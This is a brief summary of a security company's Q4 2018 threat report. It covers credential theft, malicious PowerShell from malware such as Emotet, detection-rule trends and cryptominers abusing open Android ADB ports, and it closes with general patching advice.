Welcome to the second annual Rapid7 Quarterly Threat Report wrap-up! In the last quarter of 2018, we continued to see credential theft and PowerShell usage, showing that as much as things change, some things will still stay the same. In this report, we take a closer look at our custom Attacker Behavior Analytics rules, examine some new threats we’ve seen this year (such as ADB activity), and provide some steps to help you secure your organization’s security posture.
Threat event overview: Credential theft and PowerShell usage
In Q4, we saw a rise in malware such as Emotet and Urnsif caught by the malicious PowerShell they invoke on endpoints. Also, with remote entry being the No. 1 incident type for both large and small organizations, attackers have been using past breaches along with their favorite phishing lures to get users to input their credentials.
Deep dive into Attacker Behavior Analytics
In this Threat Report, we take a look at the past year to break down the rules that go into our ABAs to get a better sense of what exactly attackers are doing. Those rules are created by our SOC analysts, who leverage their daily experience with attackers to go beyond simple indicators of compromise and turn their knowledge into rules to detect malicious behaviors in our SIEM solution, InsightIDR. Looking over the course of the year, the No. 1 rule we saw was suspicious authentication, which goes hand in hand with all the breaches and credential theft we’ve seen this year.
New threats for the year
One new threat we saw this year was cryptominers exploiting the open ADB ports on Android phones. This shows that attackers read the news and pay attention to the newest vulnerabilities, just like everyone else, and are extremely flexible when coming up with new ways to exploit victims.
Even though we saw this activity tapering off at the end of the year, one thing to keep in mind is that threats never really die, and this has the chance of coming back. So, the best thing to do here is to make sure all your devices are always up-to-date with all patches.
Read the 2018 Q4 Threat Report in its entirety for more information on the trends and activities we saw this past quarter and throughout the year, and take advantage of some of our recommendations to keep your network safe.